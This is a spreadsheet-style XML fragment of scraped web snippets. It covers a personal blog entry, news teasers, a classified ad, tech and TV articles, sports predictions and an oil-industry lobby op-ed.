    <t>A few days ago I mentioned in a post that an injury to my leg was having quite a disturbing effect on my state of wellbeing in general. I has indeed been rather distracting, especially since I had to visit our local medical centre again to have the dressing changed, and realised on that occasion how sizeable was the wound. (As I put it to a friend today, I have never before seen to much of my own blood!) It really was quite a downer, but I think that I am managing to put it into perspective. (Let’s face it: there are people who have to put up with much worse than that.) Despite all kinds of misgivings about the wisdom of this I did get out climbing today. I was extremely cautious at first, but gained in assurance as the day went on. Whether or not it has had an effect on my mind might be judged from the fact that I managed to leave my pack with all my climbing gear in my friend’s car, after he had driven me home! Or is that just age? I’m seriously hopeful that I will get down to some painting again tomorrow. Nihil obstat! as the Pope might say. (Gosh! Is that the first time in my life I’ve ever quoted the Vatican?)</t>
  </si>
  <si>
    <t>Peter Gunders</t>
  </si>
  <si>
    <t>Lynelle Urquhart's home on a property west of Moonie in outback Queensland is normally quiet. But she has been having trouble sleeping lately, thanks to late-night activity under the floorboards.</t>
  </si>
  <si>
    <t>Sarah Farnsworth</t>
  </si>
  <si>
    <t>A single phone call from Nicola Gobbo sees Faruk Orman walk free from court as the first gangland conviction is overturned in the wake of the Lawyer X scandal.</t>
  </si>
  <si>
    <t>Hello am a student 22 years old, I have class 2 license with Q endorsement, experience in the delivery system and I have SUV’s and caravan. Fast delivery 24/7 anywhere in Alberta with reasonable prize. My contact information is bellow thank you email : m.abi1999@hotmail.com cell : 58.. Read more</t>
  </si>
  <si>
    <t>Unpacked takes place in New York on Wednesday 7 August at 9pm BST, but we needn’t wait a week to see new Samsung devices. Ahead of the Note 10 and Note 10 Plus launch – and most likely to avoid detracting from the main news of the night – Samsung has confirmed it will be holding two pre-events in order to launch the Samsung Galaxy Tab S6 and Galaxy Watch Active 2. On 31 July (today) and again on 5 August (Monday) it will ‘digitally’ unveil the new devices via its website. Though it has not specified in which order they will arrive, the 5 August date shown on a leaked Galaxy Watch Active 2 render suggests the Tab S6 will come first. Samsung has confirmed that there will be a live stream at 3pm today. Very little is given away in its teaser video (shared below), but it does confirm that the Watch Active 2 will once again come without a rotating bezel, and will have a heart-rate sensor embedded into the rear. We also get a quick look at the S Pen stylus that will be supplied with the Tab S6 – as has been rumoured for the Note 10, it’s expected to feature new air gestures. It’s been only six months since we saw the original Galaxy Watch Active, so it may not be a huge upgrade over the original. From the leaked render a new leather strap and red ring around the power button are visible, and it’s rumoured that Samsung will look to rival Apple by implementing an ECG sensor and Fall Detection. The Tab S6, meanwhile, follows on from the Tab S4 and Tab S5e as a premium Android tablet fit to rival iPad Pro. It is expected to feature a 2K screen, a dual-lens camera, a generous battery, AKG speakers and some serious power with a Snapdragon 855 inside. Click here for the best Samsung deals and Samsung voucher codes. Source link</t>
  </si>
  <si>
    <t>By Scott Bailey © 2015 Here lies humanity May they rest in peace They refused to see the evidence The greed that would not cease Image from Pixabay The post RIP Humanity appeared first on Scott Andrew Bailey.</t>
  </si>
  <si>
    <t>Another Australian swimmer at the swimming world championships uses a photo opportunity with their medal to make a statement, but in decidedly less controversial circumstances this time.</t>
  </si>
  <si>
    <t>Rebecca Gredley</t>
  </si>
  <si>
    <t>A Nationals MP says his rural Queensland electorate would accept a nuclear power plant in the area, calling for an inquiry into the source for cheap power.</t>
  </si>
  <si>
    <t>This is a GE 18w compact fluorescent lamp in colour 830 – warm white. This lamp has a 2G11 cap. These lamps have an average lamp life of 10,000 hours and are often used in public buildings, offices, shops, supermarkets, hotels, restaurants and around the home. GE part code is 41088 Length:231mm Diametre:44mm Manufacturers Part No (where applicable) : 41088 This GE product is available for just £3.56 at LampShopOnline Ltd</t>
  </si>
  <si>
    <t>David Chau</t>
  </si>
  <si>
    <t>More than 30 disgruntled psychologists have complained about a psychology franchise called Life Resolutions — which is still in business, despite its liquidation, and millions of dollars in debt.</t>
  </si>
  <si>
    <t>New Zealand’s government has further tightened the country’s gun laws to establish a firearm register and overhaul licensing systems after 51 people were gunned down as they prayed at two mosques in Christchurch four months ago. Monday’s new legislation would tighten the rules for gun owners and dealers and require them to renew their licence every five years, Prime Minister Jacinda Ardern said. Currently, renewal takes place every 10 years. “In April we acted to take the most dangerous weapons out of circulation by prohibiting assault rifles and military-style semi-automatics,” Ardern said. New Zealand’s Ardern vows justice for victims of mosque attacks “Now we are moving to stop other firearms falling into the wrong hands.” The register will link gun serial numbers with licence holders and give police more powers to intervene in cases where there are suspicions about a gun owner’s behaviour. Visitors to New Zealand would also be prevented from buying a gun. New Zealand banned military-style semi-automatic and assault rifles in the first phase of gun law reforms after Australian-born Brenton Tarrant used semi-automatic weapons to massacre Muslim worshippers in the city on New Zealand’s south island. He is alleged to have used five weapons, including two military-style semi-automatic rifles, in the killings. He has pleaded not guilty to terrorism charges, as well as 51 counts of murder and 40 of attempted murder. A gun buyback scheme, the first of some 250 collections to remove semi-automatic weapons from circulation, began earlier this month. Source link</t>
  </si>
  <si>
    <t>Cameras often struggle to represent the full dynamic range of light in a scene. If you sometimes find your photos are either too dark or too bright, check out Hydra Pro HDR Editor for Mac. This software is one of the top choices by Mac users when it comes to achieving the perfect lighting on any image. Right now there’s a promotion … Android Authority The post Optimize your photo lighting with Hydra Pro HDR Editor for only $20 appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>P1xellat3d</t>
  </si>
  <si>
    <t>Appears to be a targeted offer. Would be nice to use in conjunction with the $1.10 final value fees offer however unlikely to be targeted by both. Must accept offer to be eligible.</t>
  </si>
  <si>
    <t>Michael Koziol</t>
  </si>
  <si>
    <t>The beleaguered real estate group has finally had a win - of sorts.</t>
  </si>
  <si>
    <t>The Love Island 2019 final will be airing tonight (Monday, July 29) on ITV2 at 9pm. However, before the ITV2 reality series comes to a close, the Islanders’ families paid a visit to the villa in Majorca. Love Island favourite Tommy Fury was reunited with his mum Chantal and one of his brothers, although it wasn’t Tyson Fury. Boxer Tommy’s mum finally met his girlfriend Molly-Mae Hague for the very first time last night’s episode (Sunday, July 28). Here’s what we know about Tommy Fury’s mum ahead of her Love Island appearance. Who is Tommy Fury’s mum Chantal? Love Island fans will catch their first glimpse at Tommy Fury’s mum in the second to last episode of the series. Tommy’s mum Chantal tends to stay relatively out of the limelight so her appearance on ITV2 is a rarity. Nonetheless, it clearly means a lot to son Tommy as he reveals he’s a “mummy’s boy” in tonight’s episode. WHAT IS TOMMY FURY’S NET WORTH? Chantal enters the villa with one of Tommy’s brothers, not his and Tyson’s father John as some fans expected. Tommy says in the Beach Hut: “To see them walk through the door, it was one of the best feelings I’ve had in my entire life. “I can’t put into words how happy I am to see both of them.” During their catch-up, Chantal heartwarmingly tells her son: “I’m very proud of you.” The Love Island star’s brother adds: “You’ve smashed it, lad.” HOW ARE TOMMY AND TYSON FURY REALLY RELATED? While very little is known publicly about Tommy’s mum, the Love Island star does reveal a surprising fact about her in tonight’s episode. “That woman hasn’t got on a plane in 16 years!” Tommy tells his fellow Islanders. When his mum and brother meet Molly-Mae’s mum and sister, the families instantly hit it off. Molly-Mae’s mum compliments Chantal on Tommy’s upbringing but does have one slight gripe about the boxer. WHO ARE THE LOVE ISLAND 2019 FINALISTS? “You’ve brought this lad up well,” Molly-Mae’s mum begins. “But you’ve not taught him how to cook very well!” Chantal then admits: “I enjoy doing it for him! But in all honesty, I should’ve taught him some life skills.” CAN LOVE ISLAND STARS SMOKE IN THE VILLA? Source link</t>
  </si>
  <si>
    <t>Comedy named one of the most-missed shows of the century</t>
  </si>
  <si>
    <t>Martyn Landi</t>
  </si>
  <si>
    <t>Twitter chief executive Jack Dorsey says improving the "health" of conversation on the platform remained a key focus for the company.</t>
  </si>
  <si>
    <t>The project by Facebook Inc former chief security officer Alex Stamos to battle online abuses has received $5 million from Craigslist founder Craig Newmark, the Stanford Internet Observatory said this week.</t>
  </si>
  <si>
    <t>Hulu doesn’t get enough credit. The streaming service might not have the same audience of Netflix or Amazon Prime Video, but it’s not lacking in great TV shows to watch. From Seinfeld to The X-Files, The Handmaid’s Tale to Atlanta, there’s just as much to stream here as there is on Netflix – and most of it is available to watch right after it airs on live TV. The only problem with Hulu’s massive catalog of TV shows and movies? There’s almost too much of it to go through. The good news is that if you’re limited on time and are tired of endlessly scrolling, we’ve done all the hard work ourselves and have narrowed it down to a list of 25 must-watch shows – what we consider the best Hulu TV shows. Sure, that’s just a small fraction of what’s available on the service, but it’s more than enough to get you a weekend (or three). Why Hulu over Netflix or Amazon Prime Video? If you’re on the fence about signing up for Hulu, it’s probably worth taking the leap. It’s cheaper than Netflix by a few dollars per month, and significantly cheaper than Amazon Prime Video, though the latter does come with a few more perks. In terms of content, Netflix has been pouring money into original shows and movies, but Hulu still has the biggest shows from NBC, ABC and FOX. Even better, there’s only a one-day delay between when they air on TV and when you’ll be able to stream them – you’ll never have to wait months to see new episodes ever again. Finally, while Netflix is nearly universally supported on TVs and streaming video players, Hulu is finally getting to that point, too, with support on every major video game console, smart TV and streaming video player. There are a few hold-outs out there somewhere, but if you can connect to the internet, chances are good you’re using a device that can stream Hulu. Sign up for a free 30-day trial of here here! Three decades after Hitchcock’s directorial debut came Alfred Hitchcock Presents, a series that soon became a milestone in TV history. It was hosted and produced by the Master of Suspense himself, and is perhaps best known for its iconic title sequence, with Hitchcock introducing each suspense-packed episode in his inimitable style. And Hitchcock wasn’t the only big name associated with the series – Roald Dahl wrote six episodes, stars such as Robert Redford and Bette Davis made appearances, and directors including Disney’s Robert Stevenson (Mary Poppins) stepped behind the camera. If you feel like you’ve been getting too good of sleep recently, American Horror Story is all-too-happy to fix that for you. You’ll find all eight seasons of the show on Hulu, each of which centers around a different plot line and unique set of fears. Not sure if clowns are all that scary? Watch American Horror Story. Think porous materials are harmless? Again, watch American Horror Story. Anything you love can and will be used to scare you silly. Is there anything Donald Glover can’t do? Besides writing hits like This is America as Childish Gambino, Donald Glover wrote, starred and produced this superb show about the music scene in Atlanta. The first seasons charts the rise of two cousins as hip hop artists, trying make something of themselves. The show is what you should expect from Glover. It’s smart, funny and a fitting looks at being black and middle class in America. Season 2 got a short delay as Glover starred as a young Lando in the Han Solo movie but now that’s available for your viewing pleasure, too. Although TV has no shortage of quality adult animations, Archer is undoubtedly one of the best, and perhaps the most underrated. Don’t come here looking for PC content though, for its characters are a bunch of terrible, power-hungry, expletive-spouting egoists – and that’s what makes them great. The show is based around the exploits of Archer Sterling (H. Jon Benjamin), a Don Draper-esque super-spy working for an MI5-like organization helmed by his mother (Jessica Walter), and the hilariously unfortunate situations he finds himself in while trying (or rather, failing) to save the world. Ever find yourself screaming “Yas queen!” without really knowing how the term came to be? Let Broad City educate you, for Comedy Central’s bangin’ lady duo – Abbi Jacobson and Ilana Glazer – are the reason this phrase will be forever lodged in your lexicon. Championing female friendship like no other show on TV right now (or ever, to be honest), Broad City shines a hysterically real and infinitely positive light on how ridiculous life can be… while perma-blazed on gingerbread blunts, naturally. Another hilarious sitcom brain-child of NBC, Brooklyn Nine-Nine is a satirical look at a dysfunctional police station. The series follows the brilliant but immature NYPD detective Jake Peralta, this Golden Globe-winning series is a laugh-a-minute, with plenty of deadpan jokes, physical comedy, and crackpot characters. With around 20 episodes per season Brooklyn Nine-Nine is totally bingeable, and the latest fifth season is now available on Hulu. With more sass than you can shake a vampire-slaying stake at, Buffy the Vampire Slayer is so much more than your average undead-hunting drama series (sorry, Supernatural). Starring Sarah Michelle Gellar as the no-nonsense, titular slayer, Buffy’s battles against (the still terrifying) villains who attempt to take down her nearest and dearest are but a small part of what makes this show so great. Expect wit, roundhouse kicks, tears and tantrums – and, of course, myriad quintessentially ‘90s outfits. If you’re sad about missing out on Man in the High Castle on Amazon Prime Video, Hulu has a rival book-based show that will scare and enthrall you: Castle Rock. Based off the books by author Stephen King, this horror anthology just got renewed for a second season – just in time for IT Chapter 2. There’s a reason why NBC’s Community found such a huge fanbase during its six-year run. Laden with pop-culture references and geeky, self-referential humor, this community college-set sitcom is a witty and often unpredictable series about a culturally diverse crowd united in their quest for a better education. The show boasts an outstanding cast of comedy actors, including Donald Glover, Alison Brie, Gillian Jacobs and Danny Pudi, all of whom give performances that never fail to capture the nuances of bizarre human behaviour. An outstanding adaptation of Margaret Atwood’s novel of the same name, and Hulu’s most acclaimed original series to date, The Handmaid’s Tale is one of the best TV shows of 2017. Despite being based on a now three-decades-old book, the show’s haunting dystopia remains relevant as ever. Following Offred (Elizabeth Moss), we’re catapulted into a not-too-distant, totalitarian and theocratic future that dictates fertile women become ‘handmaids’ to elite couples who have trouble conceiving. Blessed be the fruit. While its origins lie in the 1996 Coen brothers cult classic movie of the same name, FX’s black comedy crime drama has made a name for itself as a show in its own right, and a brilliant one at that, featuring a stellar cast including Martin Freeman, Kirsten Dunst and Mary Elizabeth Winstead. While the first season pays homage to the vibe of the original movie, tracking a series of murders and the antics of a downtrodden insurance salesman, the second and third installments venture into totally alternate storylines. Worth a watch? You betcha! Created, written and well-loved by animation legend Matt Groening, you might have wrote Futurama off as filler content for Fox’s Sunday night programming block. If that sounds like you, you inadvertently did a major disservice to creativity, humor and passion Groening poured into every panel year after year for over a decade. Futurama is funny, witty and has the uncanny ability to poke fun at cultural icons without sinking to juvenile mud-slinging. Each time the series got the axe broke our heart a little more, which didn’t get the mending it needed until the final episode of the final season. Initially made on a shoe-string budget, It’s Always Sunny In Philadelphia first season had a cult following, but low viewing figures meant it was destined to be a one-series wonder. Thankfully, everything changed when Season 2 was eventually green-lit, thanks to some big-time star power. Danny De Vito joined for a 10-episode run that was extended because he loved it so much. He’s still in the show that’s now in its 10th season, bringing with him huge viewing figures. The antics of Dennis (Glenn Howerton), Mac (Rob McElhenney, the show’s creator), Charlie (Charlie Kelly) and Sweet Dee (Kaitlin Olson) won’t be for everyone – at its darkest the show’s ‘comedy’ themes range from nazism to drug abuse – but stick with it and this deliciously depraved classic will reward you. Modern Family has been consistently hilarious for six seasons now, using The Simpsons’ method of showing good ol’ family values through, well, good ol’ family dysfunction. Every episode hits the spot. The writing is Emmy award-winning and the acting too, even if the central idea that the Dunphy/Pritchett family is being filmed for a documentary wears a little thin after a while. It was hailed as one of the best, and perhaps the first, coming-of-age series, and the fact that My So-Called Life was axed after one season is nothing short of a travesty. Filmed in the early ‘90s, we met Angela Chase (Claire Danes) as she poetically narrated us through her most awkward teenage years. From her first real crush (Jared Leto, who stars as the player in plaid, Jordan Catalano), new friendships and family dynamics, to conversations around diversity and LGBT issues, this show is an honest look at teenage angst and all the baggage that comes with it. With a cast list that reads like a veritable guidebook to today’s comedy superstars – Amy Poehler, Aziz Ansari, Rashida Jones, Aubrey Plaza and Chris Pratt, to name a few – the mockumentary series Parks and Recreation remains one of TV’s sharpest and funniest political satires. Set in a fictional Indiana town, the show follows a diverse group of madcap public officials whose efforts to make their city a better place often result in chaos, as you might expect from a show brought to us by Michael Shur, a writer and producer for the US version of The Office, and former Simpsons writer Greg Daniels. Go on, treat yo’ self. Need your fix of black humor and sci-fi gone wrong? Hulu’s got Adult Swim’s brain-pummeling, universe-stretching, animated adventure on tap. So sit back and allow the grandpa and grandson duo to teach you a thing or two about psychology, bizarre family dynamics and Adult Swim’s excellent scriptwriting through three seasons that promise to leave you scratching your head for days on end. Delivering subversive satire and laughs-a-plenty, Tina Fey’s 30 Rock, a show about a female TV writer trying to grasp control over backstage antics at a live, prime-time variety show, is as smart as it is downright hilarious. Every episode is layered with running gags, absurd plot twists and pop-culture references; so much so that you’ll need several sittings to appreciate each one. Fey stars alongside household names such as Tracey Morgan, Alec Baldwin, Jane Krakowski and Jack McBrayer. Forget sentimentality, complex themes and feel-good subplots, for you won’t find any in Jerry Seinfeld and Larry David’s show about four narcissists waxing lyrical about life’s absurdities. Without preaching or taking itself too seriously, Seinfeld amused its hardcore fanbase with relatable, self-referential humor and face-palm inducing antics. And there’s no strict overarching plot throughout its 172 episodes either, meaning you can dip in and out as you please. That’s pretty, prettty, pretttttttty good. After more than 30 years on the air, The Simpsons is like comfort food for many of us. It’s a series that can be picked up at any time and continues to ape the issues of the day. Witty, charming and heartfelt, The Simpsons remains a cultural touchstone that we can’t live without. Thankfully, because of Hulu, we won’t have to. That said, if The Simpsons is a bit too… family-friendly for you, South Park is also on Hulu to satisfy your satirical taste palate. While The Simpsons might include a few adult jokes in each episode, 99% of South Park’s jokes are meant for adult audiences. (The other 1% of the jokes are low-brow potty humor.) Still, as dark as the show gets South Park is another animated TV staple that we couldn’t live without. As much as we hate to admit it, Survivor remains one of the best reality shows on TV… not that it’s much of a high bar. The series that began two decades ago is now entering 32nd season – proving that it has just as much grit and survivability as the contestants it tortures week after week. The Twilight Zone marked something of a turning point in mainstream entertainment. Created by Rod Serling in the late 1950s, this anthology series introduced American homes to science fiction and fantasy; genres employed as a vehicle for social commentary on topics such as nuclear war and mass hysteria. Throughout its five seasons the show met with huge critical acclaim, and half a century later it still remains one of the most influential series of all time. Twin Peaks is the greatest, strangest season of TV spread over two seasons. The show is both beautiful and grotesque, simple and convoluted. The premise is simple: some FBI agents come to the sleepy town of Twin Peaks to investigate the murder of Laura Palmer but the way the tale is told through both dreamscapes and fairly ordinary soap opera musings makes it unmissable. Created by David Lynch and Mark Frost, the series was eventually hamstrung by annoying TV execs forcing the murderer to be revealed mid way through the second season, but this doesn’t detract from the complete brilliance of a show that was way ahead of its time. Tackling everything from paranormal phenomena and governmental cover-ups to regular appearances from nightmare-inducing monsters, The X-Files featured special agent duo Fox Mulder (David Duchovny) and Dana Scully (Gillian Anderson), with Mulder in particular convinced that the truth was out there. And ‘out there’ this cultural touchstone of a series certainly was, as wonderful as it was totally off the wall. Featuring some of the most terrifying TV episodes of all time (one word: Tooms), and labyrinthine storylines, this show is a must for any conspiracy theorist. Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: The best TV shows on Hulu: 25 must-watch TV shows and series</t>
  </si>
  <si>
    <t>Amy Knowlton, a scientist with the New England Aquarium in Boston, calls the sightings of the young whales encouraging news.</t>
  </si>
  <si>
    <t>Canadian Association of Petroleum Producers</t>
  </si>
  <si>
    <t>It’s summer in Canada and the last thing on many people’s minds is foreign-funded activist groups working against a Canadian industry. Sadly, this tactic continues to gain traction in the media. For a long time, these special-interest groups have targeted Canada’s natural resources by slapping our oil and natural gas industry with ‘dirty’ labels. They make false claims about environmental impacts or, worse, misrepresent themselves as scientific experts to gain public support. This has never been more evident than with the Global Energy Monitor (GEM) and the recent release of a report alleging that liquefied natural gas – one of the world’s cleanest forms of energy – is dirtier than coal. The report was filled with unsubstantiated statistics and little context, and was written by two environmental campaign researchers and someone who studied parasites. None is an expert in resource development. Who is GEM? According to public information, it’s an international non-government organization “in support of fossil fuel phase-out.” No one on GEM’s team is based in Canada or even appears to be Canadian. They were previously known as CoalSwarm, a group that has targeted Canadian operations in the past and continues to do so under a new name. In fact, GEM is funded by the United States-based Rockefeller Brothers Fund and the Sierra Club Foundation, among others. Despite the fact anyone with Internet access could discover that the GEM report was far from academic, not peer reviewed and produced for the sole purpose of attacking Canada’s energy industry, the organization gained a lot of national media attention. The report has been disputed and largely debunked by the Canadian Association of Petroleum Producers (CAPP), LNG Canada, the BC LNG Alliance and Brad Hayes, adjunct professor of Earth and Atmospheric Sciences at the University of Alberta. GEM is not unique. It’s just one in a series of opponents taking aim at Canada’s natural resources. Groups like GEM masquerade as non-partisan academic organizations, cherry-picking convenient data from other sources to create campaigns that, at least for now, appear to target Canada. As Canadians head into the federal election in October, groups like GEM are strategically poised to attack any Canadian-made energy policy that doesn’t include the 100 per cent phase-out of fossil fuels. That’s an unrealistic scenario based on the rise in global energy demand. The world needs more energy and a significant amount is being produced from sources that don’t have Canada’s high environmental and social standards. Canada should be the world’s supplier of choice to help lift other nations out of energy poverty, reduce global greenhouse gas emissions and displace less-responsible sources of energy like coal. With the world’s population expected to grow to more than nine billion people by 2040, the International Energy Agency forecasts total global energy demand will rise 27 per cent over 2017 levels. Oil and natural gas will account for 53 per cent of the total. CAPP represents about 80 per cent of Canada’s oil and natural gas production and advocates on behalf of industry. We are a lobby group, and have always been open and transparent about who we are and what we do. We also provide education tools to communities, other industries and institutions. We collect and share facts, data and statistics about Canada’s oil and natural gas resources. We provide information about our best practices, technology and innovation, and our relationships with Indigenous businesses, partners and communities. But lately, it seems all we do is refute a lot of misinformation. We’re fact checking and doing the background work many Canadians expect their media outlets to do – which doesn’t appear to have been done in this case. There is still time for change. It is up to all Canadians – the public and the media – to ask questions and distinguish fact from fiction, and to try and avoid being manipulated by foreign-funded activist groups. Together, we can make a difference. Tim McMillan is president and CEO of the Canadian Association of Petroleum Producers. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post As misleading environmental reports go, this one’s a GEM appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Trevor Ruszkowski-USA TODAY Sports The Pittsburgh Steelers are approaching training camp, and we provide some potential predictions for 2019. In case you didn’t know, the Pittsburgh Steelers will return to Saint Vincent College in Latrobe, PA in exactly 2 days of this article being published. With that, I decided to revive an old series we used to do as a lead up to training camp. 30 predictions in 30 days. Myself and Simon Chester are alternating days giving a prediction for the upcoming season. Some will be team oriented, while others will be specific to individual players. Either way, read on to see the reason why we think today’s prediction will come to fruition, and why it might not come true. Give your thoughts in the comment section below the article. Training camp is almost here! Here We Go! Prediction: The Steelers’ offensive line will keep Ben Roethlisberger cleaner than any other QB in 2019. Why it will happen: When it comes to continuity, the Pittsburgh Steelers’ offensive line has it going on. The 5-man starting crew remains intact, all but one Marcus Gilbert. Gilbert was shipped off to the Arizona Cardinals for a 6th round draft pick, and while many might see this as a huge loss, Gilbert has watched more football the past two seasons compared to games played. In his stead will be a competition for right tackle. The participants in this competition will be Matt Feiler, who filled in for Gilbert last year, Chukwuma Okorafor and Jerald Hawkins, among others. The fact the Steelers have several quality options speaks volumes about the scouting department, as well as the team’s overall ability to find talent at the position. With all that said, the Steelers’ line will be in charge of keeping Ben Roethlisberger upright this season. Something they did very well in 2018. Last season Roethlisberger had the third lowest sack percentage in the NFL, trailing only Drew Brees and Andrew Luck. His 3.43% was a tremendous mark, but if you ask any of the offensive linemen, they want to lead the league in this category. With everyone returning, assuming Feiler is the man at right tackle, there is no reason to think this unit can’t continue to improve to the point where Roethlisberger is atop the list after the 2019 regular season is in the books. Why it won’t happen: While their 2017 and 2018 stats are impressive, the Steelers’ offensive line had some issues in pass blocking last season. Roethlisberger was sacked 24 times in 2018, and that was a slight increase from the 2017 number of 23. This isn’t to suggest the Pittsburgh Steelers offensive line is bad, or the 2019 version of the line will fall flat on their faces and become a turnstile for defensive players en route to the quarterback. What this is suggesting is the Steelers’ will certainly have their hands full, and when it comes to dealing with pass rushing units like the Browns, Ravens, Bengals, Rams and more this season. I fully expect the offensive line to be near the top of this statistical category in 2019, but when talking about quarterbacks like Brees, who get the football out of their hands so quick, and Roethlisberger’s tendency to hold onto the football, it doesn’t seem like leading the league would be a high probability. What are your thoughts on this prediction? Do you think it will happen? Or are we crazy? Let us know by voting in the poll, and letting your voice be heard in the comment section below!</t>
  </si>
  <si>
    <t>Liebe The post Liebe – Shanice Bannis | City of Creative Dreams appeared first on Mix.Fitnessandgym.</t>
  </si>
  <si>
    <t>Leeds United Release Incredible Trailer For Amazon Documentary Series Leeds United have released a spine-tingling trailer for their upcoming fly-on-the-wall documentary based on the ups and down of last season. Set to be released on Amazon Prime next month, the six part series will feature exclusive behind the scenes footage of incidents such as the controversial ‘spygate’ scandal in their bid for Premier League promotion. From the boardroom to the changing room, go behind-the-scenes with our new show ‘Take Us Home’, coming to @primevideosport in August! pic.twitter.com/wSIHfFsIyO – Leeds United (@LUFC) July 24, 2019 The series, named Take Us Home: Leeds United, will be narrated by Hollywood actor and Leeds fan Russell Crowe. Marcelo Bielsa will also take part in his first sit-down one-on-one interview for 20 years, as he reminisces about the 2018/19 campaign in full. United chairman Andrea Radrizzani is “delighted” to be able to share this experience with the fans: “We are proud to partner with Amazon Prime Video to present this exciting documentary that chronicles a remarkable season in the history of Leeds United.” he said. “Last season, with Marcelo at the helm, we made huge strides in putting Leeds United back on the map and reconnecting the club with our local community and wider fanbase. “We are delighted to be able to share a unique, behind the scenes perspective on the ups and downs, the emotion and the intimate moments that makes this club so special.” The Dan James saga will feature in the Amazon documentary ‘Take Us Home: Leeds United’, coming this August. #lufc pic.twitter.com/4XD0I1vraw – We Are Leeds (@WeAreLeeds1919) July 23, 2019 The six-part series will be released in August, but some fans aren’t exactly keen on tuning in after a turbulent season. “Imagine watching Leeds documentary of last season to relive the heartbreak. It’s a no from me.” said one Twitter user. “Nobody wants to relive this. Bottled it to such an extreme that we broke records doing it. I’d rather spoon my eyes out and melt them down than go through that again.” said another. No thanks lads, can we have some new characters for season 2? – Michael (@HoystyM) July 24, 2019 Nobody wants to relive this. Bottled it to such an extreme that we broke records doing it. I’d rather spoon my eyes out and melt them down than go through that again – Jack Horner (@carlos061181) July 24, 2019 Weird negativity about for this Leeds United documentary. A behind-the-scenes look of a remarkable season where one man transformed a mid-table team into title contenders almost overnight sounds incredible to me. Throw in Spygate, Dan James etc too. #lufcpic.twitter.com/1GlMzZm6Yr – Tom Carnduff (@TomC_22) July 24, 2019 Season 2 better have a good ending. Season 1 rivals Game of Thrones for worst ending possible. – JB (@JGSB1919) July 24, 2019 Will you be watching this Amazon Prime documentary next month? Let us know in the comments. This post Leeds United Release Incredible Trailer For Amazon Documentary Series appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>The incident happened just hours before the Proclaimers were due to play at Edinburgh Castle. Read more? Click here</t>
  </si>
  <si>
    <t>Thieves have stolen between $150,000 and $250,000 in retirement savings from a Webberton storage unit.</t>
  </si>
  <si>
    <t>Tate’s story has garnered renewed interest as the 50th anniversary of her death approaches. See full article at Film-news.co.uk » The post Ghost Adventures star adds Sharon Tate's wedding dress to Haunted Museum appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Colin Brinsden</t>
  </si>
  <si>
    <t>Telstra chief executive Andy Penn has commended the federal government for providing clear and early national security advice on the 5G network rollout.</t>
  </si>
  <si>
    <t>What a case in miniature to show the perils of leftist thought. Via Free Beacon: A judge has dismissed a lawsuit from a college student for injuries she sustained while protesting the election of Donald Trump on a freeway, after he declared victory in November 2016. Protests on college campuses were a common sight after […]</t>
  </si>
  <si>
    <t>VANCOUVER — The BC Lions have acquired American offensive lineman Justin Renfrow and a fifth-round selection in the 2020 CFL Draft in exchange for a player off of the Lions’ negotiation list and a conditional fourth-round selection in the 2020 CFL Draft. The deal was announced Sunday, a day after the Lions were handed a 45-18 loss to the Saskatchewan Roughriders in which Mike Reilly was sacked four times and held to just 66 yards on 8-of-19 passing. Renfrow, a 6-foot-6, 310-pound tackle, has spent the past two-plus seasons with Calgary, seeing action in seven games in 2017 and 2018. The Philadelphia native began his pro career as a member of the Arizona Cardinals where we was signed as an undrafted free agent in 2014. Renfrow, a University of Miami grad, also spent time with Green Bay, Seattle, Dallas and Buffalo in the NFL before joining the Stamps in 2017. The next week or so could be busy for the Lions’ front office, as the team heads into the bye week with a 1-6 record. The problems on the O-line have been well advertised, as the club has allowed a league-worst 25 quarterback sacks through seven contests. The Lions don’t play again until Aug. 10, when they visit the Hamilton Tiger-Cats.</t>
  </si>
  <si>
    <t>Caryn Lieberman</t>
  </si>
  <si>
    <t>Under the Canada Elections Act, the chief electoral officer's decision must be made by Aug. 1.</t>
  </si>
  <si>
    <t>The Big Bang Theory dropped it’s 12th and final season leaving fans of the franchise upset at the loss of the popular sit-com. Fans of the series will know the show didn’t introduce many characters, focusing on a small group of science nerds who made an unlikely friendship with waitress Penny (played by Kaley Cuoco) who lived in their building. Penny was a fan-favourite and viewers have long been wanting to know more about her, and if they rewind back to season two episode three they may be in luck. The episode brings a discreet reveal of Penny’s real name, which is mentioned just once throughout the full 12 seasons. In the episode named “The Barbarian Sublimation,” Penny becomes addicted to the online game Age of Conan. The obsession becomes life consuming as the actress is seen stocking up on energy drinks while she sat glued to her laptop for hours, neglecting to shower. The episode sees Sheldon (Jim Parsons) do everything in his power to get the gaming addict off his back, and when Leonard (Johnny Galecki) heads across the hall to talk to her, Penny looses her cool. Clearly not wanting to be disturbed, Penny shouted: “Queen Penelope AFK.” The early season one-liner therefore reveals the star’s name is short for Penelope. The throwback episode left fans amused, with the full name only being used once throughout the whole series, many went the full 12 seasons without picking up on it. READ MORE: Penny Hofstadter’s secret storyline shake-up revealed With amusing one-liners like the “Queen Penelope” reference there is no doubt fans will be missing the show. However, season 12 did not see the last of Penny after bosses confirmed a new twist to the Young Sheldon spin-off. The season two finale of Young Sheldon featured younger versions of Leonard and Penny Hofstadter, Raj Koothrappali (Kunal Nayyar), Amy Farrah Fowler (Mayim Bialik), Howard Wolowitz (Simon Helberg) and Bernadette Rostenkowski-Wolowitz (Melissa Rauch). Although the characters didn’t meet until adulthood, fans were thrilled to see more of their favourite characters. The new season of Young Sheldon took place almost just after the season 12 finale, softening the blow for the emotional fandom. This wasn’t the first time a cross-over takes place between the two series, after young Sheldon (Ian Armitage) made an appearance in the final series of The Big Bang Theory. Fans will remember the episode where older sheldon watched back a VHS of his younger self. Although The Big Bang theory will not be airing another season, Young Sheldon has been renewed for a third and fourth season by CBS. Therefore, fans can expect their characters to live on past the season 12 finale. The Big Bang Theory season 12 is available on CBS and All4. Source link</t>
  </si>
  <si>
    <t>The gathering seems to have sparked nerves at the White House.</t>
  </si>
  <si>
